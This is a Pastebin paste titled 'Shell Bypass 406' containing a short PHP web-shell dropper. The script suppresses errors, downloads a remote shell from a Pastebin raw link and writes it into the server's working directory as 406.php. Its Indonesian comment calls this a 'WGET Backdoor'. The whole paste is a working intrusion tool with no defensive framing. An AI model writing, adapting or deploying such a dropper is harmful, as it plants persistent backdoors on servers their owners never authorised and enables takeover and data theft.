cdfteller

Shell Bypass 406

May 19th, 2018
319
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $filename="406.php"; // Nama Shell nya
  4. $fget=file_get_contents("https://pastebin.com/raw/BKFBhWiU"); // Link shell
  5.  
  6. // WGET Backdoor
  7. $path=getcwd().DIRECTORY_SEPARATOR;
  8. $fileopen=fopen("$path/$filename",'w');
  9. $execfile=fwrite($fileopen,$fget);
  10. if($execfile)
  11. {
  12. echo "Success: $path$filename";
  13. }
  14. else {
  15. echo "Failed execute newfile $filename in $path";
  16. }
  17. ?>
Advertisement
Add Comment
Please, Sign In to add comment